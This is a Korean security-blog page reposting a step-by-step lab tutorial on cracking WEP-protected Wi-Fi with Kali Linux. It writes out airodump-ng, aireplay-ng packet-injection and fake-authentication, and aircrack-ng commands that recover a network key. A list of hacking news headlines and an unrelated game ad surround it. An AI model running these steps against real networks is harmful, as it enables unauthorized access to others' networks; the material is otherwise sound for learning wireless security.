칼리 리눅스 무선랭 해킹

Wireless Lan Hacking on Kali Linux

 

WEP 프로토콜은 2000년에 이미 결점이 발견되었지만 여전히 사용 중이며 거의 모든 AP가 WEP 기능을 탑재하고 있다.

따라서 주변 AP를 스캔하고 그 중 WEP가 있다면 해당 네트워크의 내부에 접속이 가능할 수도 있도. WEP 크랙은 다음과 같이 진행된다.

 

 

 

1). 실습을 위해 AP를 다음과 같이 세팅

wc01.wep_설정.jpg

 

 

 

2. 무선랜카드를 모니터 모드로 만듬

wc02.wep1.jpg

 

 

 

 

 

 

3. 주변 AP를 스캔 및 스캔 결과를 저장

 

# airodump-ng mo0

주변 AP를 스캔하여 크랙할 AP를 찾음

 

# airodump-ng -c 9 --bssid 00-26-66-12-cc-9c -w WEPCrack mon0

위에서 얻은 AP 중 한 개를 골라서 각각의 채널 (9번)과 MAC주소 (00-26-66-~)를 설정하고,

      해당 AP를 스캔한 결과를 WEPCrack이라는 파일로 저장한다. (-w 옵션이 파일 저장 옵션)

 

wc03.wep0.jpg

 

 

 

 

 

4. 패킷 발생

경축! 아무것도 안하여 에스천사게임즈가 새로운 모습으로 재오픈 하였습니다.
어린이용이며, 설치가 필요없는 브라우저 게임입니다.
https://s1004games.com

3단계의 사진에서 보면 #Data라는 항목이 보이는데 이 항목이 매우 많아야 크랙이 가능하다. 따라서 공격자는 패킷을 대량으로

발생시켜야 하는데 여기에는 2가지 방법이 있다.

 

4-1). 이미 해당 AP와 통신 중인 MAC 주소를 이용하여 패킷 발생

# aireplay-ng -3 -b 00-26-66-12-cc-9c -h 0c-df-a4-a3-d3-40 mon0

-3 옵션 : ARP 패킷 발생 설정

-b 옵션 : 해당 AP의 MAC 주소

-h 옵션 : 패킷 발생 시 사용할 MAC 주소

wc04.web_패킷_발생_원본.jpg

 

 

 

 

4-2). 해당 AP와 통신중인 클라이언트가 없을 경우 가짜 인증 후 패킷 발생

# aireplay-ng -1 0 -a 00-26-66-12-cc-9c mon0

-1 옵션 : 가짜 인증 설정 (뒤에 숫자 0은, 재연결 시간)

-a 옵션 : 해당 AP의 MAC 주소

wc05.web_패킷_발생_가짜.jpg

 

 

사진은 찍지 못하였지만 위의 과정을 거치면 3단계의 사진에서 본 #Data 값이 매우 빠르게 증가된다. (1분 진행 시 약 3,000개)

이를 이용하여 크랙을 한다.

 

 

 

5. WEP 크랙 시도

 

wc06.wep_크랙_완료.jpg

 

 

aircrack-ng 명령어를 이용하여 크랙을 시도한다. 사진에서 볼수 잇는 IVs 값이 많아야 크랙의 확률이 높아지기 때문에 위의 4번 과정을

거친 것이다. 아래에서 보듯이 "KEY FOUND! ~~~~~ ASCII : 1234567890123" 이라고 원본 키 값이 크랙된것을 볼 수 있다.

 

 

[출처] http://anonymouskorea.tistory.com/category/Hacking/%EB%AC%B4%EC%84%A0%20%ED%95%B4%ED%82%B9

본 웹사이트는 광고를 포함하고 있습니다.
광고 클릭에서 발생하는 수익금은 모두 웹사이트 서버의 유지 및 관리, 그리고 기술 콘텐츠 향상을 위해 쓰여집니다.
번호 제목 글쓴이 날짜 조회 수
공지 침투테스트(취약점검점검, 모의해킹) 문의 / 답변 졸리운_곰 2017.12.10 28361
52 세계 70여개국서 사상최대 해킹 공격…병원·기업 업무 마비 졸리운_곰 2017.05.13 151
51 사이버 위협 첩보 전문가가 되는 세 가지 방법 file 졸리운_곰 2017.04.27 127
50 손해배상, 2차 피해 등 ‘여기어때’ 해킹사고 후폭풍 거세지나 file 졸리운_곰 2017.04.27 102
49 인터폴, 아세안 지역서 C&C 서버 9000여개 적발 file 졸리운_곰 2017.04.26 142
48 한국 비트코인 거래소 ‘야피존’ 해킹!...55억 규모 탈취 file 졸리운_곰 2017.04.26 153
47 우버, 극비 프로그램으로 경쟁사 `리프트` 정보 몰래 빼내 졸리운_곰 2017.04.15 161
46 가전제품·자동차 해킹 위험 커져...사이버범죄자=도둑 시대 오나 file 졸리운_곰 2017.03.04 126
45 [사례로 보는 개인정보 침해] ⑩여행상품 전화상담 후, 문자·전화가 계속 와요 file 졸리운_곰 2017.03.04 137
44 차세대 사이버 전쟁은 선한 AI와 악한 AI간의 대결? file 졸리운_곰 2017.03.04 130
43 신용카드사·인터파크 개인정보 유출사건 이후...기업의 법적 대응은? file 졸리운_곰 2016.08.12 147
42 암호화된 PDF 문서파일 잘못 클릭했다간...‘이메일 피싱’ 주의보 file 졸리운_곰 2016.08.07 153
41 언론보도로 집계해본 2분기 사이버 위협 키워드 넷 file 졸리운_곰 2016.08.07 192
40 정부?기업 서버 7만개 파는 지하시장 file 졸리운_곰 2016.06.19 159
39 해커가 좋아하는 '최악의 비밀번호' 1위는 file 졸리운_곰 2016.06.12 280
38 "당신의 컴퓨터가 암호화되었습니다, 풀려면 돈을 지불하세요" file 졸리운_곰 2016.06.12 167
37 애플 엑스코드고스트 변종으로 iOS 9 및 미국 비상! file 졸리운_곰 2015.11.07 172
36 '뽐뿌' 사이트 190만명 개인정보 유출 졸리운_곰 2015.09.13 261
35 구글도 찾지못한다는 다크웹(darkweb)의 실체 졸리운_곰 2015.08.22 3658
34 나체사진·성적 취향까지…해커들, 일부 회원정보 공개 file 졸리운_곰 2015.07.23 394
33 성인데이트 사이트 6천400만명 개인정보 유출 졸리운_곰 2015.05.23 248
대표 김성준 주소 : 경기 용인 분당수지 U타워 등록번호 : 142-07-27414
통신판매업 신고 : 제2012-용인수지-0185호 출판업 신고 : 수지구청 제 123호 개인정보보호최고책임자 : 김성준 sjkim70@stechstar.com
대표전화 : 010-4589-2193 [fax] 02-6280-1294 COPYRIGHT(C) stechstar.com ALL RIGHTS RESERVED